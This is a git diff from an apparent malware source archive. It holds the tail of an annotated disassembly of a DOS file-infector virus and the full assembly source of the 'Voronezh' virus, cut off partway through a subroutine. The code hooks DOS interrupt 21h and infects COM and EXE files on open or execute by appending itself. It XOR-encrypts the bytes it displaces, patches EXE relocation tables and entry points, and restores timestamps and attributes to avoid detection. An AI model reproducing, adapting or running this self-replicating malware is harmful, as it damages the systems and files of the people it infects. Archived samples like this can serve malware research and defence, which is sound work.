ax,[0283] ; find new file length +2762 3B068302 cmp ax,[0283] ; long integer addition +2766 7701 ja 2769 + +2768 42 inc dx ; high word of file length + +2769 B90002 mov cx,0200 ; convert into 512 byte pages +276C F7F1 div cx +276E 83FA00 cmp dx,0000 ; last page non empty? +2771 7401 je 2774 + +2773 40 inc ax ; count last page + +; check if header information match to real file size + +2774 8B1E4407 mov bx,[0744] ; PageCnt +2778 8BC8 mov cx,ax ; new PageCnt +277A 29D9 sub cx,bx ; diference +277C 83F905 cmp cx,0005 ; maximum possible +277F 7205 jb 2786 ; OK, continue infection + +; there is some information above program in EXE file, do not infect such a +; file, exit + +2781 58 pop ax +2782 58 pop ax +2783 E9FE01 jmp 2984 + +; continue infection + +2786 A34407 mov [0744],ax ; PageCnt, store new value +2789 5A pop dx ; restore file length +278A 58 pop ax ; low word of file length +278B 8B1EB102 mov bx,[02B1] ; position of free relocation entry +278F 39D8 cmp ax,bx +2791 7205 jb 2798 + +; find length of file part above last entry in relocation table + +2793 29D8 sub ax,bx +2795 EB04 jmp 279B +2797 90 nop + +2798 29D8 sub ax,bx +279A 4A dec dx + +279B 8916BE02 mov [02BE],dx ; address of virus entry point (segment) +279F A3C002 mov [02C0],ax ; offset +27A2 A1B102 mov ax,[02B1] ; offset in relocation table +27A5 8B1EB302 mov bx,[02B3] ; IP +27A9 BA0000 mov dx,0000 ; prepare long integer addition +27AC 01D8 add ax,bx ; add long integer +27AE 39D8 cmp ax,bx +27B0 7701 ja 27B3 + +27B2 42 inc dx + +27B3 8BF0 mov si,ax ; offset of entry point +27B5 8BFA mov di,dx ; high word +27B7 A1B502 mov ax,[02B5] ; CS +27BA B91000 mov cx,0010 ; convert to bytes +27BD F7E1 mul cx +27BF 01D7 add di,dx ; high word +27C1 01C6 add si,ax ; low word +27C3 39C6 cmp si,ax +27C5 7701 ja 27C8 + +27C7 47 inc di + +; store distance in file between first free entry in relocation table and +; program entry point in disk file + +27C8 8BC6 mov ax,si +27CA 8BD7 mov dx,di +27CC 8916BA02 mov [02BA],dx +27D0 A3BC02 mov [02BC],ax + +; move file position to entry point + +27D3 8BCA mov cx,dx +27D5 8BD0 mov dx,ax +27D7 B80042 mov ax,4200 ; move file ptr +27DA C606B00201 mov byte ptr [02B0],01 ; flag: EXE file +27DF C606AF0200 mov byte ptr [02AF],00 ; buffer extension +27E4 5B pop bx ; handle +27E5 53 push bx +27E6 CD21 int 21 + +; read oryginal five bytes from entry point + +27E8 B90500 mov cx,0005 ; number of bytes +27EB 8D16AA02 lea dx,[02AA] ; local buffer +27EF B8003F mov ax,3F00 ; read file +27F2 CD21 int 21 + +27F4 803EAA029A cmp byte ptr [02AA],9A ; signature +27F9 7503 jne 27FE ; not infected, continue + +27FB E98601 jmp 2984 ; do not infect, exit + +; continue infection + +27FE E82302 call 2A24 ; clear attributes and reopen for read/write + +; move file ptr to first not used entry in relocation table + +2801 8B1E5807 mov bx,[0758] ; TableOff +2805 A14607 mov ax,[0746] ; ReloCnt +2808 48 dec ax ; count starts from zero +2809 B90400 mov cx,0004 ; entry size +280C F7E1 mul cx +280E 01C3 add bx,ax ; offset in table +2810 B90000 mov cx,0000 +2813 8BD3 mov dx,bx +2815 B80042 mov ax,4200 ; move file ptr to BOF +2818 5B pop bx ; handle +2819 53 push bx +281A CD21 int 21 + +; write new relocation table entry + +281C 8B16B302 mov dx,[02B3] ; IP +2820 83C203 add dx,0003 ; length of instruction code and offset +2823 8916B302 mov [02B3],dx ; pointer to segment word +2827 8D16B302 lea dx,[02B3] ; buffer with CS:IP +282B B90400 mov cx,0004 ; buffer size +282E B440 mov ah,40 ; write file +2830 5B pop bx ; handle +2831 53 push bx +2832 CD21 int 21 + +; restore IP in [02B3] + +2834 8B16B302 mov dx,[02B3] +2838 83EA03 sub dx,0003 +283B 8916B302 mov [02B3],dx + +; move file ptr to begin of file + +283F 31D2 xor dx,dx +2841 31C9 xor cx,cx +2843 B80042 mov ax,4200 ; move file ptr to BOF +2846 5B pop bx ; handle +2847 53 push bx +2848 CD21 int 21 + +; write new header to file + +284A 8B0E5807 mov cx,[0758] ; TableOff, number of bytes to write +284E 8D164007 lea dx,[0740] ; offset of buffer +2852 B440 mov ah,40 ; write file +2854 CD21 int 21 + +; form code for instruction of far call to virus + +2856 C606C2029A mov byte ptr [02C2],9A ; code for CALL ssss:oooo +285B A1C002 mov ax,[02C0] ; offset of virus entry point in RAM +285E A3C302 mov [02C3],ax ; store in buffer +2861 A1BE02 mov ax,[02BE] ; segment +2864 B90010 mov cx,1000 ; ?? +2867 F7E1 mul cx +2869 A3C502 mov [02C5],ax ; new segment +286C 813EC30200F0 cmp word ptr [02C3],F000 +2872 7215 jb 2889 + +; keep offset below F000 + +2874 A1C302 mov ax,[02C3] +2877 8B16C502 mov dx,[02C5] +287B 81C20001 add dx,0100 ; adjust segment +287F 2D0010 sub ax,1000 ; decrease offset +2882 8916C502 mov [02C5],dx ; store new values +2886 A3C302 mov [02C3],ax + +; write to disk new entry point code + +2889 8B0EBA02 mov cx,[02BA] ; virus entry point on disk file +288D 8B16BC02 mov dx,[02BC] +2891 B80042 mov ax,4200 ; move file ptr +2894 5B pop bx +2895 53 push bx +2896 CD21 int 21 + +2898 B90500 mov cx,0005 ; buffer length +289B B440 mov ah,40 ; write file +289D 8D16C202 lea dx,[02C2] ; buffeer with CALL SSSS:OOOO +28A1 CD21 int 21 + +; append to file virus code + +28A3 B90000 mov cx,0000 +28A6 BA0000 mov dx,0000 +28A9 B80242 mov ax,4202 ; move file ptr to EOF +28AC 5B pop bx ; handle +28AD 53 push bx +28AE CD21 int 21 + +28B0 B440 mov ah,40 ; write file +28B2 8B0E8302 mov cx,[0283] ; virus length +28B6 BA0001 mov dx,0100 ; offset of virus code in RAM +28B9 CD21 int 21 + +; analyse relocation table + +28BB 31C9 xor cx,cx +28BD 8B165807 mov dx,[0758] ; TablOff +28C1 B80042 mov ax,4200 ; move file ptr +28C4 5B pop bx ; handle +28C5 53 push bx +28C6 CD21 int 21 + +28C8 C706CD020000 mov word ptr [02CD],0000 +28CE 8916C702 mov [02C7],dx ; store file position +28D2 A3C902 mov [02C9],ax +28D5 A14607 mov ax,[0746] ; ReloCnt +28D8 BF0000 mov di,0000 +28DB 48 dec ax ; restore oryginal value +28DC 3D0000 cmp ax,0000 +28DF 7503 jne 28E4 ; analyse relocation table + +; if oryginal relocation table was empty then exit + +28E1 E9A000 jmp 2984 ; close file, restore attr etc. + +; find size of relocation table + +28E4 B90400 mov cx,0004 +28E7 F7E1 mul cx +28E9 8BF0 mov si,ax ; offset of last used entry + +; get current file position (this is the begin of relocation teble) + +28EB B90000 mov cx,0000 +28EE BA0000 mov dx,0000 +28F1 B80142 mov ax,4201 ; move file ptr rel current position +28F4 CD21 int 21 + +; read part of relocation table + +28F6 8916C702 mov [02C7],dx ; store file position +28FA A3C902 mov [02C9],ax +28FD B90001 mov cx,0100 ; number of bytes +2900 BA0000 mov dx,0000 ; buffer +2903 B8003F mov ax,3F00 ; read file +2906 CD21 int 21 + +2908 BF0000 mov di,0000 ; point at relocation table +290B A3CB02 mov [02CB],ax ; number of bytes readed +290E 0106CD02 add [02CD],ax ; total number of readed bytes + +; check relocation table entry + +2912 8B4502 mov ax,[di+02] ; get segment +2915 3B06B502 cmp ax,[02B5] ; is it CS +2919 7551 jne 296C ; check next entry + +291B 8B05 mov ax,[di] ; get offset +291D 3B06B302 cmp ax,[02B3] ; is it IP +2921 7249 jb 296C ; check next entry + +; relocatin item points at entry point or above + +2923 A1B302 mov ax,[02B3] ; IP +2926 050500 add ax,0005 ; length of far call +2929 3B05 cmp ax,[di] ; relocation item point inside call code +292B 763F jbe 296C ; no, consider next entry + +; modify relocation table and write it to file +; let relocation item point at the same code but now stored in virus +; body in local buffer + +292D A1C502 mov ax,[02C5] ; segment of virus entry point +2930 894502 mov [di+02],ax ; store in buffer +2933 8B05 mov ax,[di] ; offset +2935 8B1EB302 mov bx,[02B3] ; old IP +2939 29D8 sub ax,bx +293B 50 push ax ; store +293C B8AA02 mov ax,02AA ; offset of local buffer +293F 2D0001 sub ax,0100 ; offset in virus body +2942 8B1EC302 mov bx,[02C3] ; offset of entry point in RAM +2946 01D8 add ax,bx +2948 5B pop bx +2949 01D8 add ax,bx +294B 8905 mov [di],ax ; new offset +294D 8B0EC702 mov cx,[02C7] ; restore file position +2951 8B16C902 mov dx,[02C9] +2955 B80042 mov ax,4200 ; move file ptr +2958 5B pop bx ; restore handle +2959 53 push bx +295A CD21 int 21 + +295C 8B0ECB02 mov cx,[02CB] ; number of bytes +2960 B440 mov ah,40 ; write file +2962 5B pop bx ; handle +2963 53 push bx +2964 BA0000 mov dx,0000 ; from +2967 CD21 int 21 +2969 EB19 jmp 2984 ; close file, etc. exit +296B 90 nop + +296C 83C704 add di,0004 ; next entry in relocation table +296F A1CD02 mov ax,[02CD] ; number of readed bytes +2972 2D0001 sub ax,0100 ; buffer size +2975 01F8 add ax,di ; current position in table +2977 39F0 cmp ax,si ; table size +2979 7409 je 2984 ; close file, etc. exit + +297B 3B3ECB02 cmp di,[02CB] ; end of buffer? +297F 7291 jb 2912 ; no, check next relocation item + +2981 E967FF jmp 28EB ; read next part of relocation table + +2984 EB67 jmp 29ED ; close file, etc. and exit +2986 90 nop + +;------------------- +; infect COM file + +; check maximum file size + +2987 8B0E8102 mov cx,[0281] ; file size +298B 81F948EE cmp cx,EE48 ; maximum file size (61000) +298F 7209 jb 299A + +; file too long or too short, exit + +2991 5B pop bx +2992 58 pop ax +2993 58 pop ax +2994 E87A00 call 2A11 ; close file and restore INT 24h +2997 E937FB jmp 24D1 ; jump to old INT 21h + +; check minimum file size + +299A 3B0E8302 cmp cx,[0283] ; virus length, minimum file size +299E 72F1 jb 2991 ; file too short, exit + +29A0 E88100 call 2A24 ; clear attributes and reopen file +29A3 C606B00200 mov byte ptr [02B0],00 + +; get file size + +29A8 BA0000 mov dx,0000 +29AB B90000 mov cx,0000 +29AE B80242 mov ax,4202 ; move file ptr to EOF +29B1 5B pop bx ; restore handle +29B2 53 push bx +29B3 CD21 int 21 + +29B5 BE8302 mov si,0283 +29B8 8B0C mov cx,[si] ; virus size +29BA B440 mov ah,40 ; write file +29BC 51 push cx +29BD BB4007 mov bx,0740 ; offset of buffer + +; encrypt block + +29C0 8A07 mov al,[bx] +29C2 34BB xor al,BB +29C4 8807 mov [bx],al +29C6 43 inc bx +29C7 E2F7 loop 29C0 + +; write to file + +29C9 59 pop cx ; block size +29CA 5B pop bx ; handle +29CB 53 push bx +29CC BA4007 mov dx,0740 ; offset of buffer +29CF CD21 int 21 + +29D1 B80042 mov ax,4200 ; move file ptr to BOF +29D4 BA0000 mov dx,0000 +29D7 B90000 mov cx,0000 +29DA CD21 int 21 + +29DC BB1001 mov bx,0110 ; faked instruction + +29DF BE8302 mov si,0283 +29E2 8B0C mov cx,[si] +29E4 BA0001 mov dx,0100 +29E7 B440 mov ah,40 ; write file +29E9 5B pop bx ; handle +29EA 53 push bx +29EB CD21 int 21 + +; common (EXE and COM) exit code, restore file date/time stamp + +29ED 5B pop bx ; handle +29EE 5A pop dx ; file date stamp +29EF 59 pop cx ; file time stamp +29F0 53 push bx ; store handle +29F1 B80157 mov ax,5701 ; restore file time/date stamp +29F4 CD21 int 21 + +; restore file attributes + +29F6 8B16D402 mov dx,[02D4] ; path offset +29FA 8E1ED202 mov ds,[02D2] ; path segment +29FE B80143 mov ax,4301 ; set file attributes +2A01 2E8B0ED002 mov cx,cs:[02D0] ; restore attributes +2A06 CD21 int 21 + +2A08 0E push cs +2A09 1F pop ds +2A0A 5B pop bx ; handle +2A0B E80300 call 2A11 ; close file and restore INT 24h +2A0E E9C0FA jmp 24D1 ; jump to old INT 21h + +;------------------------------- +; close file and restore INT 24h + +2A11 B8003E mov ax,3E00 ; close file +2A14 CD21 int 21 + +;---------------- +; restore INT 24h + +2A16 8B1E8502 mov bx,[0285] +2A1A 8E068702 mov es,[0287] +2A1E B82425 mov ax,2524 ; restore INT 24h +2A21 CD21 int 21 +2A23 C3 ret + +;------------------------------------------------ +; clear file attributes and reopen for read/write + +2A24 55 push bp +2A25 8BEC mov bp,sp +2A27 1E push ds +2A28 B80143 mov ax,4301 ; set file attributes +2A2B 8B16D402 mov dx,[02D4] ; path offset +2A2F 8E1ED202 mov ds,[02D2] ; path segment +2A33 31C9 xor cx,cx ; clear all +2A35 CD21 int 21 + +2A37 7306 jnb 2A3F ; continue + +; exit to old INT 21h + +2A39 1F pop ds +2A3A 5D pop bp +2A3B 58 pop ax +2A3C E945FF jmp 2984 ; exit + +2A3F 368B5E04 mov bx,ss:[bp+04] ; restore handle +2A43 B8003E mov ax,3E00 ; close file +2A46 CD21 int 21 + +2A48 B8023D mov ax,3D02 ; open file for read/write +2A4B FA cli +2A4C 9C pushf +2A4D 2EFF1EC201 call far [01C2] ; old INT 21h +2A52 1F pop ds + +2A53 36894604 mov ss:[bp+04],ax ; handle +2A57 5D pop bp +2A58 C3 ret + +; end of file +;---------------------------------------- +; buffer for header of infected EXE file + +cs:0740 ; 'MZ' +cs:0742 ; PartPag +cs:0744 ; PageCnt +cs:0746 ; ReloCnt +cs:0748 ; HdrSize +cs:074a ; MinMem +cs:074c ; MaxMem +cs:074e ; ReloSS +cs:0750 ; ExeSP +cs:0752 ; ChkSum +cs:0754 ; ExeIP +cs:0756 ; ReloCS +cs:0758 ; TablOff +cs:075a ; Overlay + + diff --git a/MSDOS/Virus.MSDOS.Unknown.voronezh.asm b/MSDOS/Virus.MSDOS.Unknown.voronezh.asm new file mode 100644 index 00000000..d71c8577 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.voronezh.asm @@ -0,0 +1,880 @@ + +PAGE 59,132 + +; +; +; VORONEZH +; +; Created: 2-Mar-91 +; Passes: 5 Analysis Options on: AJW +; +; + +data_1e equ 1C2h +data_5e equ 3 +data_6e equ 0 +data_7e equ 2 +data_46e equ 100h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +voronezh proc far + +start: + mov ax,ds + push cs + pop ds + push ax + call sub_1 + +voronezh endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + sub bx,108h + push bx + mov ah,0ABh + int 21h ; ??INT Non-standard interrupt + cmp ax,5555h + jne loc_1 ; Jump if not equal + jmp loc_10 +loc_1: + mov ax,es + sub ax,1 + mov ds,ax + mov bx,data_5e + mov ax,ds:[bx] + sub ax,0EAh + mov ds:[bx],ax + push es + pop ds + mov bx,data_7e + mov ax,ds:[bx] + sub ax,0EAh + mov ds:[bx],ax + mov es,ax + mov di,data_46e + mov si,100h + pop bx + push bx + add si,bx + push cs + pop ds + mov cx,6A4h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov dx,ax + jmp short loc_9 + nop + pushf ; Push flags + sti ; Enable interrupts + cmp ah,0ABh + jne loc_2 ; Jump if not equal + mov ax,5555h + popf ; Pop flags + iret ; Interrupt return +loc_2: + cmp ax,3D00h + jne loc_5 ; Jump if not equal + push ax + push bx + push cx + push dx + push si + push di + push es + mov cx,41h + xor al,al ; Zero register + mov di,dx + push ds + pop es + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + sub di,4 + mov si,di + push si + push cs + pop es + mov cx,4 + mov di,289h + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + cmp cx,0 + jne loc_3 ; Jump if not equal + pop si + jmp short loc_4 + nop +loc_3: + mov di,28Ch + mov cx,4 + pop si + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + cmp cx,0 +loc_4: + pop es + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jz loc_6 ; Jump if zero +loc_5: + push ax + inc ah + cmp ax,4C00h + pop ax + jnz loc_8 ; Jump if not zero +loc_6: + push ax + push bx + push cx + push dx + push si + push di + push es + push ds + jmp loc_16 +loc_7: + pop ds + pop es + pop di + pop si + pop dx + pop cx + pop bx + pop ax +loc_8: + popf ; Pop flags +;* jmp far ptr loc_49 + db 0EAh,0B5h, 02h, 46h,0D5h +loc_9: + mov ds,dx + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_1e,bx + db 3Eh, 8Ch, 06h,0C4h, 01h, 3Eh + db 89h, 1Eh, 75h, 03h, 3Eh, 8Ch + db 06h, 77h, 03h, 8Dh, 16h, 53h + db 01h,0B8h, 21h, 25h,0CDh + db 21h +loc_10: + pop dx + mov bx,offset data_18 + add bx,dx + cmp byte ptr cs:[bx],0 + je loc_12 ; Jump if equal + pop ds + mov ax,ds + push cs + pop ds + mov cx,dx + pop di + pop es + push ax + sub di,5 + mov si,offset data_17 + add si,cx + mov dl,[si] + add es:[di+5],dl + cmp es:[di+5],dl + ja loc_11 ; Jump if above + dec si + inc byte ptr [si] +loc_11: + mov dx,di + mov si,offset data_16 + add si,cx + mov cx,5 + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop ds + push es + push dx + mov ax,ds + mov es,ax + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + xor di,di ; Zero register + retf ; Return far +loc_12: + mov ax,cs + mov ds,ax + mov es,ax + mov si,268h + mov cx,100h + mov bx,281h + mov di,[bx] + cmp di,0 + jne loc_13 ; Jump if not equal + int 20h ; DOS program terminate +loc_13: + mov bx,283h + mov ax,[bx] + add di,ax + add di,100h + cld ; Clear direction + push di + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop di + mov cx,word ptr ds:[283h] + mov ax,word ptr ds:[281h] + push di + retn + add ax,100h + mov si,ax + mov di,100h + cld ; Clear direction + +locloop_14: + mov al,[si] + xor al,0BBh + mov [di],al + inc si + inc di + loop locloop_14 ; Loop if cx > 0 + + mov ax,offset start + pop bx + push ax + retn + inc ax + push es + inc ax + push es + push si + add ax,0E2Bh + inc bp + pop ax + inc bp + db 65h, 78h, 65h, 55h, 76h, 7Fh + db 'ctsqu`Voronezh,1990 2.01' +data_16 db 90h + db 0B8h, 7Fh, 0Eh, 8Eh +data_17 db 0 +data_18 db 0 +data_19 dw 200h +data_20 dw 14Dh +data_21 db 0, 0, 0, 0, 0 +data_22 dw 0 +data_23 dw 34Dh +data_24 dw 0 +data_25 dw 5D0h +data_26 db 9Ah +data_27 dw 5D0h +data_28 dw 0 +data_29 dw 0 +data_30 dw 1Eh +data_31 dw 100h +data_32 dw 100h +data_33 db 5 +data_34 dw 20h +data_35 dw 0A956h +data_36 dw 41B9h + +loc_ret_15: + iret ; Interrupt return +loc_16: + mov bx,dx + mov ax,ds:[bx+3] + cmp ax,4F43h + jne $+5 ; Jump if not equal + jmp loc_7 +sub_1 endp + + mov di,dx + xor ax,ax ; Zero register + mov cs:data_33,0 + db 3Eh, 80h, 7Dh, 01h, 3Ah + db 75h, 09h, 3Eh, 8Ah, 05h, 24h + db 9Fh, 2Eh,0A2h,0CFh, 02h +loc_18: + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get attrb cx, filename @ds:dx + mov cs:data_34,cx + mov cs:data_35,ds + mov cs:data_36,dx + push ds + push dx + push es + push cs + pop ds + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov word ptr ds:[285h],bx + mov word ptr ds:[287h],es + mov dx,offset loc_ret_15 + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + pop dx + pop ds + push ds + push cs + pop ds + mov bx,100h + mov cx,740h + sub cx,bx + mov bx,283h + mov [bx],cx + pop ds + mov bx,dx + push ds + push dx + push bx + push cs + pop ds + mov ah,36h ; '6' + mov dl,data_33 + int 21h ; DOS Services ah=function 36h + ; get drive info, drive dl,1=a: + ; returns ax=clust per sector + ; bx=avail clust,cx=bytes/sect + ; dx=clusters per drive + cmp ax,0FFFFh + jne loc_24 ; Jump if not equal +loc_23: + pop ax + pop ax + pop ax + call sub_3 + jmp loc_7 +loc_24: + mul bx ; dx:ax = reg * ax + mul cx ; dx:ax = reg * ax + or dx,dx ; Zero ? + jnz loc_25 ; Jump if not zero + cmp ax,word ptr ds:[283h] + jb loc_23 ; Jump if below +loc_25: + pop bx + pop dx + pop ds + mov ax,3D00h + pushf ; Push flags + cli ; Disable interrupts +;* call far ptr sub_5 + db 9Ah,0B5h, 02h, 46h,0D5h + jnc loc_26 ; Jump if carry=0 + call sub_3 + jmp loc_7 +loc_26: + push ax + mov ax,cs + mov ds,ax + mov es,ax + pop ax + push ax + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + pop ax + push cx + push dx + push ax + mov bx,ax + mov cx,0 + mov dx,0 + mov ah,42h ; 'B' + mov al,2 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,281h + mov [bx],ax + mov bx,283h + mov cx,[bx] + mov cx,0 + mov dx,0 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,283h + mov cx,[bx] + pop bx + push bx + mov dx,offset data_37 + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov si,offset data_37 + mov cx,[si] + cmp cx,0D88Ch + jne loc_27 ; Jump if not equal + pop bx + pop ax + pop ax + call sub_2 + jmp loc_7 +loc_27: + cmp cx,5A4Dh + je loc_28 ; Jump if equal + jmp loc_44 +loc_28: + pop bx + push bx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,32h + mov ax,3F00h + lea dx,data_37 ; Load effective addr + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,data_39 + mov cx,4 + mul cx ; dx:ax = reg * ax + mov bx,data_44 + add ax,bx + mov dx,ax + mov di,dx + mov ax,data_40 + mov cx,10h + mul cx ; dx:ax = reg * ax + mov dx,di + add dx,4 + cmp ax,dx + ja loc_29 ; Jump if above + jmp loc_43 +loc_29: + mov data_19,ax + mov ax,data_39 + inc ax + mov data_39,ax + mov ax,data_42 + mov data_20,ax + mov ax,data_43 + mov word ptr data_21,ax + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4202h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + push ax + push dx + add ax,word ptr ds:[283h] + cmp ax,word ptr ds:[283h] + ja loc_30 ; Jump if above + inc dx +loc_30: + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + cmp dx,0 + je loc_31 ; Jump if equal + inc ax +loc_31: + mov bx,data_38 + mov cx,ax + sub cx,bx + cmp cx,5 + jb loc_32 ; Jump if below + pop ax + pop ax + jmp loc_43 +loc_32: + mov data_38,ax + pop dx + pop ax + mov bx,data_19 + cmp ax,bx + jb loc_33 ; Jump if below + sub ax,bx + jmp short loc_34 + nop +loc_33: + sub ax,bx + dec dx +loc_34: + mov data_24,dx + mov data_25,ax + mov ax,data_19 + mov bx,data_20 + mov dx,0 + add ax,bx + cmp ax,bx + ja loc_35 ; Jump if above + inc dx +loc_35: + mov si,ax + mov di,dx + mov ax,word ptr data_21 + mov cx,10h + mul cx ; dx:ax = reg * ax + add di,dx + add si,ax + cmp si,ax + ja loc_36 ; Jump if above + inc di +loc_36: + mov ax,si + mov dx,di + mov data_22,dx + mov data_23,ax + mov cx,dx + mov dx,ax + mov ax,4200h + mov data_18,1 + mov data_17,0 + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,5 + lea dx,data_16 ; Load effective addr + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + cmp data_16,9Ah + jne loc_37 ; Jump if not equal + jmp loc_43 +loc_37: + call sub_4 + mov bx,data_44 + mov ax,data_39 + dec ax + mov cx,4 + mul cx ; dx:ax = reg * ax + add bx,ax + mov cx,0 + mov dx,bx + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,data_20 + add dx,3 + mov data_20,dx + lea dx,data_20 ; Load effective addr + mov cx,4 + mov ah,40h ; '@' + pop bx + push bx + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov dx,data_20 + sub dx,3 + mov data_20,dx + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,data_44 + lea dx,data_37 ; Load effective addr + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov data_26,9Ah + mov ax,data_25 + mov data_27,ax + mov ax,data_24 + mov cx,1000h + mul cx ; dx:ax = reg * ax + mov data_28,ax + cmp data_27,0F000h + jb loc_38 ; Jump if below + mov ax,data_27 + mov dx,data_28 + add dx,100h + sub ax,1000h + mov data_28,dx + mov data_27,ax +loc_38: + mov cx,data_22 + mov dx,data_23 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,5 + mov ah,40h ; '@' + lea dx,data_26 ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov cx,0 + mov dx,0 + mov ax,4202h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov cx,word ptr ds:[283h] + mov dx,100h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + xor cx,cx ; Zero register + mov dx,data_44 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov data_32,0 + mov data_29,dx + mov data_30,ax + mov ax,data_39 + mov di,0 + dec ax + cmp ax,0 + jne loc_39 ; Jump if not equal + jmp loc_43 +loc_39: + mov cx,4 + mul cx ; dx:ax = reg * ax + mov si,ax +loc_40: + mov cx,0 + mov dx,0 + mov ax,4201h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov data_29,dx + mov data_30,ax + mov cx,100h + mov dx,data_6e + mov ax,3F00h + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov di,data_6e + mov data_31,ax + add data_32,ax +loc_41: + mov ax,[di+2] + cmp ax,word ptr data_21 + jne loc_42 ; Jump if not equal + mov ax,[di] + cmp ax,data_20 + jb loc_42 ; Jump if below + mov ax,data_20 + add ax,5 + cmp ax,[di] + jbe loc_42 ; Jump if below or = + mov ax,data_28 + mov [di+2],ax + mov ax,[di] + mov bx,data_20 + sub ax,bx + push ax + mov ax,2AAh + sub ax,100h + mov bx,data_27 + add ax,bx + pop bx + add ax,bx + mov [di],ax + mov cx,data_29 + mov dx,data_30 + mov ax,4200h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov cx,data_31 + mov ah,40h ; '@' + pop bx + push bx + mov dx,data_6e + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + jmp short loc_43 + nop +loc_42: + add di,4 + mov ax,data_32 + sub ax,100h + add ax,di + cmp ax,si + je loc_43 ; Jump if equal + cmp di,data_31 + jb loc_41 ; Jump if below + jmp loc_40 +loc_43: + jmp short loc_48 + nop +loc_44: + mov cx,word ptr ds:[281h] + cmp cx,0EE48h + jb loc_46 ; Jump if below +loc_45: + pop bx + pop ax + pop ax + call sub_2 + jmp loc_7 +loc_46: + cmp cx,word ptr ds:[283h] + jb loc_45 ; Jump if below + call sub_4 + mov data_18,0 + mov dx,0 + mov cx,0 + mov ax,4202h + pop bx + push bx + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov si,283h + mov cx,[si] + mov ah,40h ; '@' + push cx + mov bx,offset data_37 + +locloop_47: + mov al,[bx] + xor al,0BBh + mov [bx],al + inc bx + loop locloop_47 ; Loop if cx > 0 + + pop cx + pop bx + push bx + mov dx,offset data_37 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4200h + mov dx,0 + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov bx,110h + mov si,283h + mov cx,[si] + mov dx,100h + mov ah,40h ; '@' + pop bx + push bx + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer +loc_48: + pop bx + pop dx + pop cx + push bx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + mov dx,data_36 + mov ds,data_35 + mov ax,4301h + mov cx,cs:data_34 + int 21h ; DOS Services ah=function 43h + ; set attrb cx, filename @ds:dx + push cs + pop ds + pop bx + call sub_2 + jmp loc_7 + +; +; SUBROUTINE +; + +sub_2 proc near + mov ax,3E00h + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + +; External Entry into Subroutine + +sub_3: + mov bx,word ptr ds:[285h] + mov es,word ptr ds:[287h] + 